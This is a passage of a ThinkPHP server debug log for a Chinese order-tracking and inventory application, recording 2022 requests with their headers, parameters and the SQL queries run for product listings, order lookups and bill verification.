'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000102s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:13:12+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021122s][吞吐率:47.34req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000047s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001188s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:13:13+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.018452s][吞吐率:54.19req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001061s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:13:16+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020754s][吞吐率:48.18req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001212s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:13:18+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020361s][吞吐率:49.11req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001180s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:13:18+08:00 ] 221.192.178.45 POST /api/kuguan/order/getnotruorderbuid?staff_id=99&offset=4&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=99&offset=4&pageNum=10 [运行时间:0.051785s][吞吐率:19.31req/s] [内存消耗:4,757.58kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001217s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'offset' => '4', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001698s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000451s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001477s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000476s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001823s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001168s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 40 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1658308398>orderinfo.end_time desc,1658308398>orderinfo.end_time desc,1658308398-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 40,10 [ RunTime:0.002934s ] --------------------------------------------------------------- [ 2022-07-20T17:13:18+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020787s][吞吐率:48.11req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000052s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001171s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:13:19+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021090s][吞吐率:47.42req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000046s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001166s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:13:19+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019420s][吞吐率:51.49req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000051s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001159s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:13:20+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019701s][吞吐率:50.76req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000054s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001188s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:13:20+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020416s][吞吐率:48.98req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000046s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001194s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:13:33+08:00 ] 106.112.205.110 GET /admin/productmge/productinfo/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%7D&op=%7B%7D&_=1658307484168 [ info ] 47.105.33.115:8081/admin/productmge/productinfo/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%7D&op=%7B%7D&_=1658307484168 [运行时间:0.064856s][吞吐率:15.42req/s] [内存消耗:5,463.23kb] [文件加载:84] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001295s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'productmge.productinfo', 2 => 'index', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/productmge/productinfo?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=8uveookelkl3mdcrs65gsc4gp2', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{}', 'op' => '{}', '_' => '1658307484168', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001525s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/productmge/productinfo.php [ info ] [ RUN ] app\admin\controller\productmge\Productinfo->index[ /alidata/www/gendan/application/admin/controller/productmge/Productinfo.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000123s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000559s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001974s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000417s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001240s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001338s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001634s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001167s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_productinfo` `productinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `productinfo`.`factorymge_id`=`factorymge`.`id` WHERE `productinfo`.`factorymge_id` = '40' AND `product_status` = '1' ORDER BY `productinfo`.`id` DESC LIMIT 1 [ RunTime:0.000661s ] [ sql ] [ SQL ] SELECT `productinfo`.`id`,`productinfo`.`product_avatar`,`productinfo`.`name`,`productinfo`.`product_num`,`productinfo`.`kucun`,`productinfo`.`takeup_kucun`,`productinfo`.`staff_ids`,`productinfo`.`staff_names`,`productinfo`.`pid`,`productinfo`.`corresponding_num`,`productinfo`.`position`,`productinfo`.`price`,`productinfo`.`factorymge_id`,`productinfo`.`product_status`,`productinfo`.`admin_id`,`productinfo`.`createtime`,`productinfo`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime FROM `ot_productinfo` `productinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `productinfo`.`factorymge_id`=`factorymge`.`id` WHERE `productinfo`.`factorymge_id` = '40' AND `product_status` = '1' ORDER BY `productinfo`.`id` DESC LIMIT 0,10 [ RunTime:0.000447s ] [ sql ] [ SQL ] SELECT `productinfo`.`id`,`productinfo`.`product_avatar`,`productinfo`.`name`,`productinfo`.`product_num`,`productinfo`.`kucun`,`productinfo`.`takeup_kucun`,`productinfo`.`staff_ids`,`productinfo`.`staff_names`,`productinfo`.`pid`,`productinfo`.`corresponding_num`,`productinfo`.`position`,`productinfo`.`price`,`productinfo`.`factorymge_id`,`productinfo`.`product_status`,`productinfo`.`admin_id`,`productinfo`.`createtime`,`productinfo`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,sum(kucun*price) as total FROM `ot_productinfo` `productinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `productinfo`.`factorymge_id`=`factorymge`.`id` WHERE `productinfo`.`factorymge_id` = '40' AND `product_status` = '1' ORDER BY `productinfo`.`id` DESC LIMIT 1 [ RunTime:0.001268s ] --------------------------------------------------------------- [ 2022-07-20T17:13:33+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020249s][吞吐率:49.38req/s] [内存消耗:2,227.84kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001089s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'image/webp,image/*,*/*;q=0.8', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/productmge/productinfo?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=8uveookelkl3mdcrs65gsc4gp2', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:13:54+08:00 ] 106.112.205.110 POST /admin/financial/verifybill/hedui/ids/1758?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/verifybill/hedui/ids/1758?dialog=1 [运行时间:0.144498s][吞吐率:6.92req/s] [内存消耗:6,194.68kb] [文件加载:94] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001178s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'hedui', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '601', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/1758?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=gk91f7mp89i7dggs5dsr9vjrg4', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'kehu_id' => array ( 0 => '王', 1 => '154', ), 'verify_amount' => array ( 0 => '12000', 1 => '12000', 2 => '12000', 3 => '12000', ), 'price' => array ( 0 => '2.33', 1 => '1.4', 2 => '0.06', 3 => '0.06', ), 'money' => array ( 0 => '27960', 1 => '16800', 2 => '720', 3 => '720', ), 'explain' => array ( 0 => '100W-7底壳12000个', 1 => '100W-2上盖12000个', 2 => '大平压板12000个', 3 => '大弯压板12000个', ), 'shoukuan_status-1' => '0', 'shoukuan_status-2' => '0', 'shoukuan_status-3' => '0', 'shoukuan_status-4' => '0', 'ids' => '1758', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001648s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->hedui[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.008412s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000613s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001456s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000391s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001062s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001130s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001660s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000319s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.001284s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001743s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001265s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.001182s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.001150s ] [ sql ] [ SQL ] SELECT `outboundandorder`.`id`,`outboundandorder`.`outbound_id`,`outboundandorder`.`orderinfo_id`,`outboundandorder`.`kehu_id`,`outboundandorder`.`amount`,`outboundandorder`.`money`,`outboundandorder`.`price`,`outboundandorder`.`productinfo_id`,`outboundandorder`.`factorymge_id`,`outboundandorder`.`staffinfo_id`,`outboundandorder`.`admin_id`,`outboundandorder`.`createtime`,`outboundandorder`.`updatetime`,`outboundandorder`.`verify_status`,`outboundandorder`.`verify_amount`,orderinfo.id AS orderinfo__id,orderinfo.nei_number AS orderinfo__nei_number,orderinfo.number AS orderinfo__number,orderinfo.pid AS orderinfo__pid,orderinfo.order_company AS orderinfo__order_company,orderinfo.order_connect AS orderinfo__order_connect,orderinfo.order_phone AS orderinfo__order_phone,orderinfo.kehu_id AS orderinfo__kehu_id,orderinfo.price AS orderinfo__price,orderinfo.material_id AS orderinfo__material_id,orderinfo.pProductinfo_id AS orderinfo__pProductinfo_id,orderinfo.productinfo_id AS orderinfo__productinfo_id,orderinfo.order_type AS orderinfo__order_type,orderinfo.order_status AS orderinfo__order_status,orderinfo.all_order_status AS orderinfo__all_order_status,orderinfo.shengchan_status AS orderinfo__shengchan_status,orderinfo.zuixinshuoming AS orderinfo__zuixinshuoming,orderinfo.guzhangshu AS orderinfo__guzhangshu,orderinfo.zuixinguzhang AS orderinfo__zuixinguzhang,orderinfo.techprocess_id AS orderinfo__techprocess_id,orderinfo.actual_amount AS orderinfo__actual_amount,orderinfo.kucun_amount AS orderinfo__kucun_amount,orderinfo.produce_amount AS orderinfo__produce_amount,orderinfo.produced_amount AS orderinfo__produced_amount,orderinfo.waste_amount AS orderinfo__waste_amount,orderinfo.produced_time AS orderinfo__produced_time,orderinfo.send_amount AS orderinfo__send_amount,orderinfo.ruku_posi AS orderinfo__ruku_posi,orderinfo.sent_amount AS orderinfo__sent_amount,orderinfo.out_time AS orderinfo__out_time,orderinfo.build_order_staffid AS orderinfo__build_order_staffid,orderinfo.factorymge_id AS orderinfo__factorymge_id,orderinfo.admin_id AS orderinfo__admin_id,orderinfo.remind_day AS orderinfo__remind_day,orderinfo.build_time AS orderinfo__build_time,orderinfo.end_time AS orderinfo__end_time,orderinfo.responsible_staffinfos AS orderinfo__responsible_staffinfos,orderinfo.responsible_staffinfovars AS orderinfo__responsible_staffinfovars,orderinfo.feedback AS orderinfo__feedback,orderinfo.guoqitime AS orderinfo__guoqitime,orderinfo.guoqi_status AS orderinfo__guoqi_status,orderinfo.put_position AS orderinfo__put_position,orderinfo.createtime AS orderinfo__createtime,orderinfo.updatetime AS orderinfo__updatetime,orderinfo.is_modify AS orderinfo__is_modify,orderinfo.purchaseorder_id AS orderinfo__purchaseorder_id,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS 